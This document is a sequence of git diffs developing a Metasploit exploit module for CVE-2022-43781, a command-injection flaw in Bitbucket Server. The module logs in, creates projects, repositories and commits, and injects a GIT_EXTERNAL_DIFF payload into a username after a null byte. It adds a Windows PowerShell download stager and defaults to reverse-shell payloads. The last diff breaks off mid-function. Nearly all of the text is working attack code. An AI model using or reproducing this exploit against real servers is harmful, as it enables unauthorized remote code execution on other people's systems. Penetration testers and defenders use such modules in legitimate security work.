+  Rank = NormalRanking # https://docs.metasploit.com/docs/using-metasploit/intermediate/exploit-ranking.html
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Bitbucket Environment Variable RCE',
+        'Description' => %q{
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Ry0taK', # Vulnerability Discovery
+          'y4er', # PoC and blog post
+          'Shelby Pace' # Metasploit Module
+        ],
+        'References' => [
+          [ 'URL', 'https://y4er.com/posts/cve-2022-43781-bitbucket-server-rce/'],
+          [ 'CVE', '2022-43781']
+        ],
+        'Platform' => [ 'win', 'linux' ],
+        'Privileged' => false,
+        'Arch' => [ ARCH_X86, ARCH_X64 ],
+        'Targets' => [
+          [ 'Automatic Target', {}],
+          [ 'Linux', {}],
+          [ 'Windows', {}]
+        ],
+        'DisclosureDate' => '2022-11-16',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [],
+          'Reliability' => [],
+          'SideEffects' => []
+        }
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(7990),
+        OptString.new('USERNAME', [ false, 'User name to log in with' ]),
+        OptString.new('PASSWORD', [ false, 'Password to log in with' ]),
+        OptString.new('TARGETURI', [ true, 'The URI of the Bitbucket instance', '/']),
+        OptBool.new('USE_PUBLIC_SIGNUP', [ true, 'Attempt to create an account through public signup if enabled', true ])
+      ]
+    )
+  end
+
+  def check
+    # Check for Bitbucket and version if it's available
+    res = request_login_page
+
+    return CheckCode::Unknown('Failed to retrieve a response from the target') unless res
+    return CheckCode::Safe('Target does not appear to be Bitbucket') unless res.body.include?('Bitbucket')
+
+    nokogiri_data = res.get_html_document
+    footer = nokogiri_data&.at('footer')
+    return CheckCode::Detected('Failed to retrieve version information from Bitbucket') unless footer
+
+    version_info = footer.at('span')&.children&.text
+    return CheckCode::Detected('Failed to find version information in footer section') unless version_info
+
+    vers_matches = version_info.match(/v(\d+\.\d+\.\d+)/)
+    return CheckCode::Detected('Failed to find version info in expected format') unless vers_matches && vers_matches.length > 1
+
+    version_str = vers_matches[1]
+
+    vprint_status("Found version #{version_str} of Bitbucket")
+    # vers_no = Rex::Version.new(version_str)
+    major, minor, revision = version_str.split('.')
+    rev_num = revision.to_i
+
+    case major
+    when '7'
+      case minor
+      when '0', '1', '2', '3', '4', '5'
+        return CheckCode::Appears
+      when '6'
+        return CheckCode::Appears if rev_num >= 0 && rev_num <= 18
+      when '7', '8', '9', '10', '11', '12', '13', '14', '15', '16'
+        return CheckCode::Appears
+      when '17'
+        return CheckCode::Appears if rev_num >= 0 && rev_num <= 11
+      when '18', '19', '20'
+        return CheckCode::Appears
+      when '21'
+        return CheckCode::Appears if rev_num >= 0 && rev_num <= 5
+      end
+    when '8'
+      print_status('Versions 8.* are vulnerable only if the mesh setting is disabled')
+      case minor
+      when '0'
+        return CheckCode::Appears if rev_num >= 0 && rev_num <= 4
+      when '1'
+        return CheckCode::Appears if rev_num >= 0 && rev_num <= 4
+      when '2'
+        return CheckCode::Appears if rev_num >= 0 && rev_num <= 3
+      when '3'
+        return CheckCode::Appears if rev_num >= 0 && rev_num <= 2
+      when '4'
+        return CheckCode::Appears if rev_num == 0 || rev_num == 1
+      end
+    end
+
+    CheckCode::Detected
+  end
+
+  def validate_credentials(username, password)
+    username ||= datastore['USERNAME']
+    password ||= datastore['PASSWORD']
+
+    [ username, password ]
+  end
+
+  def request_login_page
+    send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'login'),
+      'keep_cookies' => true
+    )
+  end
+
+  # signup page will return 302 and redirect to login page
+  # if public signup is disabled
+  def public_signup_available?
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'signup'),
+      'keep_cookies' => true
+    )
+
+    return false unless res
+    return true if res.code == 200 && res.body.include?('Sign up')
+
+    print_status('Public signup is not enabled')
+    false
+  end
+
+  def create_account
+    u_name = Faker::Internet.username
+    email = Faker::Internet.email
+    full_name = Faker::Name.name
+    pass = Faker::Internet.password
+
+    u_name_payload = "#{u_name}\u0000GIT_EXTERNAL_DIFF=$(#{payload.encoded})"
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'signup'),
+      'keep_cookies' => true,
+      'vars_post' => {
+        'username' => u_name_payload,
+        'fullname' => full_name,
+        'email' => email,
+        'password' => pass,
+        'confirmPassword' => pass,
+        'submit' => 'Sign Up'
+      }
+    )
+
+    unless res && res.code == 302 && res.headers['Location'].include?('signedUp')
+      fail_with(Failure::UnexpectedReply, 'Account creation failed')
+    end
+
+    print_good('Account creation was successful!')
+    [ u_name_payload, pass ]
+  end
+
+  def log_in(username, password)
+    res = request_login_page
+    fail_with(Failure::UnexpectedReply, 'Failed to access login page') unless res&.body&.include?('login')
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'j_atl_security_check'),
+      'keep_cookies' => true,
+      'vars_post' => {
+        'j_username' => username,
+        'j_password' => password,
+        'submit' => 'Log in'
+      }
+    )
+
+    fail_with(Failure::UnexpectedReply, 'Didn\'t retrieve a response') unless res
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'dashboard'),
+      'keep_cookies' => true
+    )
+
+    fail_with(Failure::UnexpectedReply, 'No response from the dashboard') unless res
+    unless res.body.include?('Logged in')
+      fail_with(Failure::UnexpectedReply, 'Failed to log in. Please check credentials')
+    end
+  end
+
+  def change_username; end
+
+  def exploit
+    @using_public_account = datastore['USE_PUBLIC_SIGNUP']
+    if public_signup_available? && datastore['USE_PUBLIC_SIGNUP']
+      username, password = create_account
+      @using_public_account = (username && password ? true : false)
+    end
+
+    username, password = validate_credentials(username, password)
+    fail_with(Failure::BadConfig, 'No credentials to log in with.') unless username && password
+
+    log_in(username, password)
+    unless @using_public_account
+      change_username
+    end
+  end
+end

--- a/modules/exploits/multi/http/bitbucket_env_var_rce.rb
+++ b/modules/exploits/multi/http/bitbucket_env_var_rce.rb
@@ -4,12 +4,13 @@
 ##
 
 class MetasploitModule < Msf::Exploit::Remote
-  Rank = NormalRanking # https://docs.metasploit.com/docs/using-metasploit/intermediate/exploit-ranking.html
+  Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::Git
   include Msf::Exploit::Git::SmartHttp
-  require 'pry-byebug'
+  include Msf::Exploit::CmdStager
+  prepend Msf::Exploit::Remote::AutoCheck
 
   def initialize(info = {})
     super(
@@ -26,27 +27,28 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'References' => [
           [ 'URL', 'https://y4er.com/posts/cve-2022-43781-bitbucket-server-rce/'],
+          [ 'URL', 'https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-security-advisory-2022-11-16-1180141667.html'],
           [ 'CVE', '2022-43781']
         ],
-        'Payload' => { 'Space' => 254 },
-        'Platform' => [ 'win', 'linux', 'unix' ],
+        'Platform' => [ 'win', 'unix' ],
         'Privileged' => false,
-        'Arch' => [ ARCH_X86, ARCH_X64 ],
+        'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],
         'Targets' => [
           [
             'Linux',
             {
               'Platform' => 'unix',
-              'Type' => :linux_cmd,
-              # 'Arch' => [ ARCH_X86, ARCH_X64 ],
-              'Arch' => [ ARCH_CMD ],
-              'Payload' => { 'BadChars' => %(*:/?#[]@) }
-              # 'DefaultOptions' => { 'Payload' => 'linux/x64/meterpreter/reverse_tcp' }
+              'Payload' => { 'Space' => 254 },
+              'Arch' => [ ARCH_CMD ]
             }
           ],
           [
             'Windows',
-            {}
+            {
+              'Platform' => 'win',
+              'Type' => :win_dropper,
+              'Arch' => [ ARCH_X86, ARCH_X64 ]
+            }
           ]
         ],
         'DisclosureDate' => '2022-11-16',
@@ -64,14 +66,17 @@ class MetasploitModule < Msf::Exploit::Remote
         Opt::RPORT(7990),
         OptString.new('USERNAME', [ false, 'User name to log in with' ]),
         OptString.new('PASSWORD', [ false, 'Password to log in with' ]),
-        OptString.new('TARGETURI', [ true, 'The URI of the Bitbucket instance', '/']),
-        OptBool.new('USE_PUBLIC_SIGNUP', [ true, 'Attempt to create an account through public signup if enabled', true ])
+        OptString.new('TARGETURI', [ true, 'The URI of the Bitbucket instance', '/'])
       ]
     )
   end
 
   def check
-    res = request_login_page
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'login'),
+      'keep_cookies' => true
+    )
 
     return CheckCode::Unknown('Failed to retrieve a response from the target') unless res
     return CheckCode::Safe('Target does not appear to be Bitbucket') unless res.body.include?('Bitbucket')
@@ -89,7 +94,6 @@ class MetasploitModule < Msf::Exploit::Remote
     version_str = vers_matches[1]
 
     vprint_status("Found version #{version_str} of Bitbucket")
-    # vers_no = Rex::Version.new(version_str)
     major, minor, revision = version_str.split('.')
     rev_num = revision.to_i
 
@@ -128,91 +132,21 @@ class MetasploitModule < Msf::Exploit::Remote
     CheckCode::Detected
   end
 
-  def validate_credentials(username, password)
-    username ||= datastore['USERNAME']
-    password ||= datastore['PASSWORD']
-
-    [ username, password ]
-  end
-
-  def request_login_page
-    send_request_cgi(
-      'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path, 'login'),
-      'keep_cookies' => true
-    )
-  end
-
-  # signup page will return 302 and redirect to login page
-  # if public signup is disabled
-  def public_signup_available?
-    res = send_request_cgi(
-      'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path, 'signup'),
-      'keep_cookies' => true
-    )
-
-    return false unless res
-    return true if res.code == 200 && res.body.include?('Sign up')
-
-    print_status('Public signup is not enabled')
-    false
-  end
-
-  def create_account
-    u_name = Faker::Internet.username
-    email = Faker::Internet.email
-    full_name = Faker::Name.name
-    pass = Faker::Internet.password
-
-    #    u_name_payload = "#{u_name}\u0000GIT_EXTERNAL_DIFF=$(#{payload.encoded})"
-    u_name_payload = "#{u_name}\u0000GIT_EXTERNAL_DIFF="
-
-    res = send_request_cgi(
-      'method' => 'POST',
-      'uri' => normalize_uri(target_uri.path, 'signup'),
-      'keep_cookies' => true,
-      'vars_post' => {
-        'username' => u_name_payload,
-        'fullname' => full_name,
-        'email' => email,
-        'password' => pass,
-        'confirmPassword' => pass,
-        'submit' => 'Sign Up'
-      }
-    )
-
-    unless res && res.code == 302 && res.headers['Location'].include?('signedUp')
-      fail_with(Failure::UnexpectedReply, 'Account creation failed')
-    end
-
-    print_good('Account creation was successful!' + " #{pass}")
-    [ u_name_payload, pass ]
-  end
-
-  def project_name
-    @project_name ||= Rex::Text.rand_text_alpha(5..9)
-  end
-
-  def project_key
-    @project_key ||= Rex::Text.rand_text_alpha(5..9).upcase
-  end
-
-  def repo_name
-    @repo_name ||= Rex::Text.rand_text_alpha(5..9)
-  end
-
   def default_branch
     @default_branch ||= Rex::Text.rand_text_alpha(5..9)
   end
 
   def uname_payload
-    # @uname_payload ||= "#{datastore['USERNAME']}\u0000GIT_EXTERNAL_DIFF=$(#{payload.encoded.strip})"
-    @uname_payload ||= "#{datastore['USERNAME']}\u0000GIT_EXTERNAL_DIFF=$(/usr/bin/printf HACKED > /tmp/hax)"
+    @uname_payload ||= "#{datastore['USERNAME']}\u0000GIT_EXTERNAL_DIFF=$(#{payload.encoded.strip})"
   end
 
   def log_in(username, password)
-    res = request_login_page
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'login'),
+      'keep_cookies' => true
+    )
+
     fail_with(Failure::UnexpectedReply, 'Failed to access login page') unless res&.body&.include?('login')
 
     res = send_request_cgi(
@@ -258,6 +192,8 @@ class MetasploitModule < Msf::Exploit::Remote
     @token = token_data['value']
     fail_with(Failure::UnexpectedReply, 'No token found') if @token.blank?
 
+    project_name = Rex::Text.rand_text_alpha(5..9)
+    project_key = Rex::Text.rand_text_alpha(5..9).upcase
     res = send_request_cgi(
       'method' => 'POST',
       'uri' => proj_uri,
@@ -274,10 +210,11 @@ class MetasploitModule < Msf::Exploit::Remote
     fail_with(Failure::UnexpectedReply, 'Failed to create project') unless res['Location']&.include?(project_key)
 
     print_status('Project creation was successful')
+    [ project_name, project_key ]
   end
 
   def create_repository
-    repo_uri = normalize_uri(target_uri.path, 'projects', project_key, 'repos?create')
+    repo_uri = normalize_uri(target_uri.path, 'projects', @project_key, 'repos?create')
     res = send_request_cgi(
       'method' => 'GET',
       'uri' => repo_uri,
@@ -293,6 +230,7 @@ class MetasploitModule < Msf::Exploit::Remote
     email = dropdown_data&.at('span')&.[]('data-emailaddress')
     fail_with(Failure::UnexpectedReply, 'Failed to retrieve email address from response') if email.blank?
 
+    repo_name = Rex::Text.rand_text_alpha(5..9)
     res = send_request_cgi(
       'method' => 'POST',
       'uri' => repo_uri,
@@ -308,21 +246,22 @@ class MetasploitModule < Msf::Exploit::Remote
       }
     )
 
-    fail_with(Failure::UnexpectedReply, 'Not response received from repo creation') unless res
+    fail_with(Failure::UnexpectedReply, 'No response received from repo creation') unless res
     res = send_request_cgi(
       'method' => 'GET',
       'keep_cookies' => true,
-      'uri' => normalize_uri(target_uri.path, 'projects', project_key, 'repos', repo_name, 'browse')
+      'uri' => normalize_uri(target_uri.path, 'projects', @project_key, 'repos', repo_name, 'browse')
     )
 
     fail_with(Failure::UnexpectedReply, 'Repository was not created') if res&.code == 404
-    print_good("Successfully created repository #{repo_name}")
+    print_good("Successfully created repository '#{repo_name}'")
 
-    email
+    [ email, repo_name ]
   end
 
+  # create two files in two separate commits in order
+  # to view a diff and get code execution
   def create_commits(email)
-    # create a text file with random text
     txt_data = Rex::Text.rand_text_alpha(5..20)
     blob_object = GitObject.build_blob_object(txt_data)
     file_name = "#{Rex::Text.rand_text_alpha(4..10)}.txt"
@@ -341,7 +280,6 @@ class MetasploitModule < Msf::Exploit::Remote
       "refs/heads/#{default_branch}" => commit_obj.sha1
     }
 
-    # create second commit object
     new_file_data = Rex::Text.rand_text_alpha(5..20)
     new_blob_object = GitObject.build_blob_object(new_file_data)
     new_file = "#{Rex::Text.rand_text_alpha(4..10)}.txt"
@@ -363,7 +301,7 @@ class MetasploitModule < Msf::Exploit::Remote
       }
     )
 
-    git_uri = normalize_uri(target_uri.path, "scm/#{project_key}/#{repo_name}.git")
+    git_uri = normalize_uri(target_uri.path, "scm/#{@project_key}/#{@repo_name}.git")
     res = send_receive_pack_request(
       git_uri,
       refs['HEAD'],
@@ -402,10 +340,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
     headers = {
       'X-Requested-With' => 'XMLHttpRequest',
-      'X-AUSERNAME' => curr_uname,
       'X-AUSERID' => @user_id,
-      'Origin' => "#{ssl ? 'https' : 'http'}://#{peer}",
-      'Referer' => "#{ssl ? 'https' : 'http'}://#{peer}/admin/users/view?name=#{curr_uname}"
+      'Origin' => "#{ssl ? 'https' : 'http'}://#{peer}"
     }
 
     vars = {
@@ -422,20 +358,27 @@ class MetasploitModule < Msf::Exploit::Remote
       'data' => vars
     )
 
-    fail_with(Failure::UnexpectedReply, 'Did not receive a response to the user name change request') unless res
+    unless res
+      print_bad('Did not receive a response to the user name change request')
+      return false
+    end
 
     unless res.body.include?(new_uname) || res.body.include?('GIT_EXTERNAL_DIFF')
-      fail_with(Failure::UnexpectedReply, 'User name change was unsuccessful')
+      print_bad('User name change was unsuccessful')
+      return false
     end
+
+    vprint_good('User name was successfully changed')
+    true
   end
 
-  def view_commit(latest_commit_sha, first_commit_sha, diff_file)
-    commit_uri = normalize_uri(
+  def view_commit_diff(latest_commit_sha, first_commit_sha, diff_file)
+    commit_diff_uri = normalize_uri(
       target_uri.path,
       'rest/api/latest/projects',
-      project_key,
+      @project_key,
       'repos',
-      repo_name,
+      @repo_name,
       'commits',
       latest_commit_sha,
       'diff',
@@ -444,43 +387,121 @@ class MetasploitModule < Msf::Exploit::Remote
 
     send_request_cgi(
       'method' => 'GET',
-      'uri' => commit_uri,
+      'uri' => commit_diff_uri,
       'keep_cookies' => true,
       'vars_get' => { 'since' => first_commit_sha }
     )
+  end
+
+  def delete_repository(username)
+    vprint_status("Attempting to delete repository '#{@repo_name}'")
+    repo_uri = normalize_uri(target_uri.path, 'projects', @project_key, 'repos', @repo_name.downcase)
+    res = send_request_cgi(
+      'method' => 'DELETE',
+      'uri' => repo_uri,
+      'keep_cookies' => true,
+      'headers' => {
+        'X-AUSERNAME' => username,
+        'X-AUSERID' => @user_id,
+        'X-Requested-With' => 'XMLHttpRequest',
+        'Origin' => "#{ssl ? 'https' : 'http'}://#{peer}",
+        'ctype' => 'application/json',
+        'Accept' => 'application/json, text/javascript'
+      }
+    )
+
+    unless res&.body&.include?('scheduled for deletion')
+      print_warning('Failed to delete repository')
+      return
+    end
+
+    print_good('Repository has been deleted')
+  end
+
+  def delete_project(username)
+    vprint_status("Now attempting to delete project '#{@project_name}'")
+    send_request_cgi( # fails to return a response
+      'method' => 'DELETE',
+      'uri' => normalize_uri(target_uri.path, 'projects', @project_key),
+      'keep_cookies' => true,
+      'headers' => {
+        'X-AUSERNAME' => username,
+        'X-AUSERID' => @user_id,
+        'X-Requested-With' => 'XMLHttpRequest',
+        'Origin' => "#{ssl ? 'https' : 'http'}://#{peer}",
+        'Referer' => "#{ssl ? 'https' : 'http'}://#{peer}/projects/#{@project_key}/settings",
+        'ctype' => 'application/json',
+        'Accept' => 'application/json, text/javascript, */*; q=0.01',
+        'Accept-Encoding' => 'gzip, deflate'
+      }
+    )
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'projects', @project_key),
+      'keep_cookies' => true
+    )
+
+    unless res&.code == 404
+      print_warning('Failed to delete project')
+      return
+    end
+
+    print_good('Project has been deleted')
   end
 
   def exploit
     datastore['GIT_USERNAME'] = datastore['USERNAME']
     datastore['GIT_PASSWORD'] = datastore['PASSWORD']
 
-    @using_public_account = datastore['USE_PUBLIC_SIGNUP']
-    if public_signup_available? && datastore['USE_PUBLIC_SIGNUP']
-      username, password = create_account
-      @using_public_account = (username && password ? true : false)
+    if datastore['USERNAME'].blank? && datastore['PASSWORD'].blank?
+      fail_with(Failure::BadConfig, 'No credentials to log in with.')
     end
 
-    username, password = validate_credentials(username, password)
-    fail_with(Failure::BadConfig, 'No credentials to log in with.') unless username && password
+    log_in(datastore['USERNAME'], datastore['PASSWORD'])
 
-    log_in(username, password)
-=begin
-    unless @using_public_account
-      change_username
-    end
-=end
-
-    create_project
-    email = create_repository
-    latest_commit, first_commit, diff_file = create_commits(email)
-    print_good("Commits added: #{first_commit}, #{latest_commit}")
+    @project_name, @project_key = create_project
+    email, @repo_name = create_repository
+    @latest_commit, @first_commit, @diff_file = create_commits(email)
+    print_good("Commits added: #{@first_commit}, #{@latest_commit}")
 
     print_status('Sending payload')
-    change_username(datastore['USERNAME'], uname_payload)
-    view_commit(latest_commit, first_commit, diff_file)
+    if target['Type'] == :win_dropper
+      execute_cmdstager(linemax: 254 - "#{datastore['USERNAME']}\u0000EXTERNAL_GIT_DIFF=$(cmd.exe /c )".length, flavor: :psh_invokewebrequest, noconcat: true, nodelete: true, temp: '.')
+    else
+      @changed = change_username(datastore['USERNAME'], uname_payload)
+      fail_with(Failure::UnexpectedReply, 'User name change failed. The user may not have the correct permissions') unless @changed
+
+      view_commit_diff(@latest_commit, @first_commit, @diff_file)
+    end
   end
 
   def cleanup
-    change_username(uname_payload, datastore['USERNAME'])
+    curr_uname = datastore['USERNAME']
+    if @changed
+      curr_uname = uname_payload
+      print_status("Changing user name back to '#{datastore['USERNAME']}'")
+      curr_uname = datastore['USERNAME'] if change_username(uname_payload, datastore['USERNAME'])
+    end
+
+    if curr_uname == uname_payload
+      print_warning('User name is still set to payload.' \
+                    "Please manually change the user name back to #{datastore['USERNAME']}")
+    end
+
+    delete_repository(curr_uname) if @repo_name
+    delete_project(curr_uname) if @project_name
+  end
+
+  def execute_command(cmd, _opts = {})
+    unless @changed
+      @curr_cmd_uname = datastore['USERNAME']
+    end
+
+    # require 'pry';binding.pry
+    curr_payload = (cmd.ends_with?('.exe') ? "#{datastore['USERNAME']}\u0000GIT_EXTERNAL_DIFF=$(cmd.exe /c #{cmd})" : "#{datastore['USERNAME']}\u0000GIT_EXTERNAL_DIFF=$(#{cmd})")
+    @changed = change_username(@curr_cmd_uname, curr_payload)
+    view_commit_diff(@latest_commit, @first_commit, @diff_file)
+    @curr_cmd_uname = curr_payload
   end
 end

--- a/modules/exploits/multi/http/bitbucket_env_var_rce.rb
+++ b/modules/exploits/multi/http/bitbucket_env_var_rce.rb
@@ -18,13 +18,16 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name' => 'Bitbucket Environment Variable RCE',
         'Description' => %q{
-          For various versions of Bitbucket, there is a command injection
+          For various versions of Bitbucket, there is an authenticated command injection
           vulnerability that can be exploited by injecting environment
           variables into a user name. This module achieves remote code execution
           as the `atlbitbucket` user by injecting the `GIT_EXTERNAL_DIFF` environment
           variable, a null character as a delimiter, and arbitrary code into a user's
           user name. The value (payload) of the `GIT_EXTERNAL_DIFF` environment variable
           will be run once the Bitbucket application is coerced into generating a diff.
+
+          This module requires at least admin credentials, as admins and above
+          only have the option to change their user name.
         },
         'License' => MSF_LICENSE,
         'Author' => [
@@ -46,8 +49,9 @@ class MetasploitModule < Msf::Exploit::Remote
             {
               'Platform' => 'unix',
               'Type' => :unix_cmd,
+              'Arch' => [ ARCH_CMD ],
               'Payload' => { 'Space' => 254 },
-              'Arch' => [ ARCH_CMD ]
+              'DefaultOptions' => { 'Payload' => 'cmd/unix/reverse_bash' }
             }
           ],
           [
@@ -351,7 +355,7 @@ class MetasploitModule < Msf::Exploit::Remote
     scripts = scripts.select { |script| script&.children&.text&.include?("name\":\"#{curr_uname}\"") }
     fail_with(Failure::UnexpectedReply, 'Failed to get scripts that match user name') unless scripts
 
-    matched_id = scripts&.first&.children&.text&.match(/id":(\d+),"displayName/)
+    matched_id = scripts&.first&.children&.text&.match(/"id":(\d+)/)
     fail_with(Failure::UnexpectedReply, 'No matches found for id of user') unless matched_id && matched_id.length > 1
 
     matched_id[1]

--- a/modules/exploits/multi/http/bitbucket_env_var_rce.rb
+++ b/modules/exploits/multi/http/bitbucket_env_var_rce.rb
@@ -7,6 +7,8 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = NormalRanking # https://docs.metasploit.com/docs/using-metasploit/intermediate/exploit-ranking.html
 
   include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Git
+  include Msf::Exploit::Git::SmartHttp
 
   def initialize(info = {})
     super(
@@ -29,9 +31,20 @@ class MetasploitModule < Msf::Exploit::Remote
         'Privileged' => false,
         'Arch' => [ ARCH_X86, ARCH_X64 ],
         'Targets' => [
-          [ 'Automatic Target', {}],
-          [ 'Linux', {}],
-          [ 'Windows', {}]
+          [
+            'Linux',
+            {
+              'Platform' => 'linux',
+              'Type' => :linux_cmd,
+              'Arch' => [ ARCH_X86, ARCH_X64 ],
+              'Payload' => { 'BadChars' => %(*:/?#[]@) },
+              'DefaultOptions' => { 'Payload' => 'linux/x64/meterpreter/reverse_tcp' }
+            }
+          ],
+          [
+            'Windows',
+            {}
+          ]
         ],
         'DisclosureDate' => '2022-11-16',
         'DefaultTarget' => 0,
@@ -55,7 +68,6 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    # Check for Bitbucket and version if it's available
     res = request_login_page
 
     return CheckCode::Unknown('Failed to retrieve a response from the target') unless res
@@ -150,7 +162,8 @@ class MetasploitModule < Msf::Exploit::Remote
     full_name = Faker::Name.name
     pass = Faker::Internet.password
 
-    u_name_payload = "#{u_name}\u0000GIT_EXTERNAL_DIFF=$(#{payload.encoded})"
+    #    u_name_payload = "#{u_name}\u0000GIT_EXTERNAL_DIFF=$(#{payload.encoded})"
+    u_name_payload = "#{u_name}\u0000GIT_EXTERNAL_DIFF="
 
     res = send_request_cgi(
       'method' => 'POST',
@@ -170,8 +183,16 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::UnexpectedReply, 'Account creation failed')
     end
 
-    print_good('Account creation was successful!')
+    print_good('Account creation was successful!' + " #{pass}")
     [ u_name_payload, pass ]
+  end
+
+  def repo_name
+    @repo_name ||= Rex::Text.rand_text_alpha(5..9)
+  end
+
+  def default_branch
+    @default_branch ||= Rex::Text.rand_text_alpha(5..9)
   end
 
   def log_in(username, password)
@@ -202,9 +223,87 @@ class MetasploitModule < Msf::Exploit::Remote
     end
   end
 
+  def create_repository(username)
+    repo_uri = normalize_uri(target_uri.path, 'users', username, 'repos?create')
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => repo_uri,
+      'keep_cookies' => true
+    )
+
+    fail_with(Failure::UnexpectedReply, 'Failed to access repo creation page') unless res
+
+    html_doc = res.get_html_document
+    token_data = html_doc.at('div//input[@name="atl_token"]')
+    fail_with(Failure::UnexpectedReply, 'Failed to find element containing \'atl_token\'') unless token_data
+
+    token = token_data['value']
+    fail_with(Failure::UnexpectedReply, 'No token found') if token.blank?
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => repo_uri,
+      'vars_post' => {
+        'name' => repo_name,
+        'defaultBranchId' => default_branch,
+        'description' => '',
+        'scmId' => 'git',
+        'forkable' => 'false',
+        'atl_token' => token,
+        'submit' => 'Create repository'
+      },
+      'keep_cookies' => true
+    )
+
+    fail_with(Failure::UnexpectedReply, 'Not response received from repo creation') unless res
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'users', username, 'repos', repo_name, 'browse')
+    )
+
+    fail_with(Failure::UnexpectedReply, 'Repository was not created') if res&.code == 404
+    print_good("Successfully created repository #{repo_name}")
+  end
+
+  def create_commit(username)
+    # create a text file with random text
+    txt_data = Rex::Text.rand_text_alpha(5..20)
+    blob_object = GitObject.build_blob_object(txt_data)
+    file_name = "#{Rex::Text.rand_text_alpha(4..10)}.txt"
+
+    file_data = {
+      mode: '100755',
+      file_name: file_name,
+      sha1: blob_object.sha1
+    }
+    tree_obj = GitObject.build_tree_object(file_data)
+
+    commit_obj = GitObject.build_commit_object({ tree_sha1: tree_obj.sha1, email: 'blair@okon.name' })
+
+    # create a packfile for repo and push to default branch
+    refs = {
+      'HEAD' => "refs/head/#{default_branch}",
+      "refs/head/#{default_branch}" => commit_obj.sha1
+    }
+
+    git_uri = normalize_uri(target_uri.path, "scm/~#{username}/#{repo_name}.git")
+    res = send_receive_pack_request(
+      git_uri,
+      refs['HEAD'],
+      [ commit_obj, tree_obj, blob_object ],
+      '0' * 40 # no commits should exist yet, so no branch tip in repo yet
+    )
+
+    fail_with(Failure::UnexpectedReply, 'Failed to push commit to repository') unless res
+    # require 'pry';binding.pry
+  end
+
   def change_username; end
 
   def exploit
+    datastore['GIT_USERNAME'] = datastore['USERNAME']
+    datastore['GIT_PASSWORD'] = datastore['PASSWORD']
+
     @using_public_account = datastore['USE_PUBLIC_SIGNUP']
     if public_signup_available? && datastore['USE_PUBLIC_SIGNUP']
       username, password = create_account
@@ -218,5 +317,8 @@ class MetasploitModule < Msf::Exploit::Remote
     unless @using_public_account
       change_username
     end
+
+    create_repository(username)
+    create_commit(username)
   end
 end

--- a/modules/exploits/multi/http/bitbucket_env_var_rce.rb
+++ b/modules/exploits/multi/http/bitbucket_env_var_rce.rb
@@ -397,15 +397,21 @@ class MetasploitModule < Msf::Exploit::Remote
     true
   end
 
-  def view_commit_diff(latest_commit_sha, first_commit_sha, diff_file)
-    commit_diff_uri = normalize_uri(
+  def commit_uri(project_key, repo_name, commit_sha)
+    normalize_uri(
       target_uri.path,
       'rest/api/latest/projects',
-      @project_key,
+      project_key,
       'repos',
-      @repo_name,
+      repo_name,
       'commits',
-      latest_commit_sha,
+      commit_sha
+    )
+  end
+
+  def view_commit_diff(latest_commit_sha, first_commit_sha, diff_file)
+    commit_diff_uri = normalize_uri(
+      commit_uri(@project_key, @repo_name, latest_commit_sha),
       'diff',
       diff_file
     )
@@ -475,7 +481,83 @@ class MetasploitModule < Msf::Exploit::Remote
     print_good('Project has been deleted')
   end
 
+  def get_repo
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'rest/api/latest/repos'),
+      'keep_cookies' => true
+    )
+
+    unless res
+      print_status('Couldn\'t access repos page. Will create repo')
+      return []
+    end
+
+    json_data = JSON.parse(res.body)
+    unless json_data && json_data['size'] >= 1
+      print_status('No accessible repositories. Will attempt to create a repo')
+      return []
+    end
+
+    repo_data = json_data['values'].first
+    repo_name = repo_data['slug']
+    project_key = repo_data['project']['key']
+
+    unless repo_name && project_key
+      print_status('Could not find repo name and key. Creating repo')
+      return []
+    end
+
+    [ repo_name, project_key ]
+  end
+
+  def get_repo_info
+    unless @project_name && @project_key
+      print_status('Failed to find valid project information. Will attempt to create repo')
+      return nil
+    end
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri('projects', @project_key, 'repos', @project_name, 'commits'),
+      'keep_cookies' => true
+    )
+
+    unless res
+      print_status("Failed to access existing repository #{@project_name}")
+      return nil
+    end
+
+    html_doc = res.get_html_document
+    commit_data = html_doc.search('a[@class="commitid"]')
+    unless commit_data && commit_data.length > 1
+      print_status('No commits found for existing repo')
+      return nil
+    end
+
+    latest_commit = commit_data[0]['data-commitid']
+    prev_commit = commit_data[1]['data-commitid']
+
+    file_uri = normalize_uri(commit_uri(@project_key, @project_name, latest_commit), 'changes')
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => file_uri,
+      'keep_cookies' => true
+    )
+
+    return nil unless res
+
+    json = JSON.parse(res.body)
+    return nil unless json['values']
+
